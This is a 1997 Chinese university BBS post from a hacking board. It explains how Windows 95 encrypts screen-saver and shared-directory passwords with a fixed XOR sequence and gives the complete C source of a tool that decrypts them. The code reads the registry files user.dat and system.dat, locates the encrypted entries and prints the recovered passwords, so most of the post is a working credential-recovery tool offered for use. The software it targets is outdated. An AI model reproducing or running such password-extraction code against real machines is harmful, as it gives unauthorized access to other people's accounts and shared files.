发信人: Yt_Yan@bbs.ustc.edu.cn (严某人), 信区: cnhacker
标 题: 如何破解win95的screen saver口令
发信站: 中国科大BBS站 (Sat Apr 5 20:43:19 1997)
转信站: Lilac!ustcnews!ustcnews!ustcbbs
【 在 jesse (捷思) 的大作中提到: 】
: Window95共享目录口令与屏幕保护口令的加密方法是相同的,口令密文放在注册库
: HKEY_LOCAL_MACHINE\SOFTWARE\micorsoft\windows\current_version\network
: \lanman\目录名\Parm1enc和Parm2enc两位置,但有时注册库里缺少最后一个字符的密文.
: 明文与数列(前八个数是35,9a,4d,a6,53,a9,d4,6a)作异或运算即得密文.
// Filename SCREEN.CPP
// (C) Copyright CAD Center, HUST. All Rights Reserved
// Compile with SMALL model Tel:7545402(H)7543973(O)
/************************************************************
function : Show your SCREENSAVE password
programmer: Jesse
Usage : SCREEN
date : 1996.3.9
************************************************************/
#include <stdio.h>
#include <conio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <bios.h>
//#include <windows.h>
#define BYTE unsigned char
#define BUFLEN 0x7f00
#define passlen 20
char buf[ 0x7fff ];
static char serial[66]="ScreenSave_Data";
char str [passlen]; //found pasword
char pass[passlen]; //right password
BYTE strp[passlen]; //mi wen
BYTE key[0x102];
BYTE v20[4]={0xb2,0xdc,0x90,0x8f};
//HKEY_LOCAL_MACHINE_SOFTWARE_micorsoft_windows_current_version_network_lanman
BYTE lanman[32]={5,0xaa,0x7d,0x96,0x63,0x99,0xe4,0x5a};
int quiet=0;
void unEncrypt(char * str);
void init();
char path[144]="";
FILE *fp;
#define cprintf printf
void help(void)
{
cprintf("\nWindows 95 Password Utility (Version 1.00) Apr.1996 Tel:(027)7543973\r\n");
cprintf("Show your computer's ScreenSave and shared directory password\n");
cprintf(" May be missing last char or append a char when show some password!\n");
cprintf("(C) Copyright Jesse CAD Center, HUST. All Rights Reserved\r\n\n");
cprintf("Usage : screen -- find Password \n");
cprintf(" screen /q -- quiet modle,show password only\n");
cprintf("\r\n");
return;
}
// find keyword in buffer
long findbuf( long cur, long len ,FILE *fp,char *serial)
{
int l;
int i;
l= strlen( serial);
fseek( fp, cur, 0);
fread( buf, len,1 ,fp);
for (i=0;i<BUFLEN-l; i++)
if ( strncmp(serial, buf+i, l)==0)
return cur+i;
return 0L;
}
//find keyword in file
long findid( char *name,char *serial, int (*fn)(long ) )
{
int n,r,i;
long posi,l;
long cur=0;
fp= fopen(name,"rb");
if (fp==NULL)
return 0;
fseek( fp, 0,2);
l= ftell( fp);
fseek( fp, 0,0);
n = l /BUFLEN;
r= l %BUFLEN;
for( i=0;i<n;i++)
{
posi=findbuf(cur, BUFLEN+30,fp,serial);
if( posi)
fn(posi);
cur+=BUFLEN;
}
posi=findbuf(cur,r,fp,serial);
if (posi)
fn(posi);
fclose(fp);
return posi;
}
//initial data
void init()
{
register int i;
int v13=0,cl,ax,tmp, bl=0;
for (i=0;i<0x100;i++)
key[i]=i;
for ( i=0;i<0x100;i++)
{
cl= key[i];
ax= v20[v13]+cl+bl;
ax&= 0xff;
bl= ax;
tmp= key[ax];
key[ax]= cl;
key[i] = tmp;
v13= (v13+1) & 3 ;
}
}
//find screen save password
void unEncrypt(char * str)
{
BYTE v12=0,v13=0;
BYTE bp, len,cx,dx;
init();
len= strlen(pass );
for( bp=0;bp<len;bp++)
{
v13=( v13+1);
cx =key[v13];
v12=(cx+v12);
dx = key[v12];
key[v13]=dx;
key[v12]=cx;
dx =(cx+dx);
cx =key[dx];
str[bp]^=cx;
}
printf("ScreenSave Password=%s\n",pass);
return ;
}
// read hex data of password
int read_USERDAT(char *pass)
{
char *p=serial+15;
int i=0, uu=0;
char t;
while (*p)
{
t=p[2];
p[2]=0;
sscanf(p,"%hx", &uu);
p[2]=t;
pass[i++]=uu;
p+=2;
}
pass[i]=0;
return 0;
}
//find shared directory data
int findstr( char *p, char *str)
{
int f=0;
if (strncmp(p, "Path",4)==0)
{
f=1;
strcpy(str, p+4);
}
if (strncmp(p, "Parm1enc",8)==0)
{
f=2;
strcpy(str, p+8);
}
if (strncmp(p, "Parm2enc",8)==0)
{
f=3;
strcpy(str, p+8);
}
return f;
}
//show shared directory password
int shown(long posi)
{
int i,j,count=0;
char str[44];
fseek(fp, posi-0x100,SEEK_SET);
fread(buf ,BUFLEN ,1,fp);
for ( i=0;i<BUFLEN-8;i++)
{
int kk= findstr( & buf[i],str);
if ( kk==1)
{
if ( count==0)
{
str[strlen(str)-1]=0;
printf("\nPath=%-20s",str);
}
}
else if ( kk>1 )
{
if ( str[1])
{
if (kk==2) printf(" Read_only Password=");
if (kk==3) printf(" Full Password=");
j=0;
while (str[j] )
{
char c=str[j] ^ 0x30 ^ lanman[j++];
if (c>0)
printf("%c", c);
}
}
count++;
if (count==2) {
count=0; break;
}
}
}
return 0;
}
//show screen password
int shows(long posi)
{
fseek(fp, posi,SEEK_SET);
fread(serial,65,1,fp);
if (quiet==0)
printf("%s\n",serial);
read_USERDAT(pass);
unEncrypt( pass);
return 0;
}
//main of password utility
void main(int argc, char *argv[])
{
char *ptr;
char name[144]="";
for ( int i=0;i<8;i++)
printf("%3x ", lanman[i]^0x30);
if( argc>1 && (strcmp(argv[1],"/q")==0 ||strcmp(argv[1],"/Q")==0) )
quiet=1;
if (quiet==0)
{
clrscr();
help();
}
#ifdef __WINDOWS_H
if ( GetWindowsDirectory((LPSTR)path , sizeof(path))==0)
return;
#else
ptr = getenv("PATH");
ptr= strstr(ptr,":\\WIN");
strcpy( path , ptr-1);
ptr=path ;
while ( *ptr && *ptr!=';')
ptr++;
*ptr=0;
#endif
strcpy(name,path);
strcat(name,"\\user.dat");
findid( name, serial, shows);
printf("\nSHARED Directory & Password");
strcpy(name,path);
strcat(name,"\\system.dat");
findid( name, "Parm1enc", shown);
printf("\n");
return;
}
--
※ 来源: 中国科大BBS站 [bbs.ustc.edu.cn]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:6.508毫秒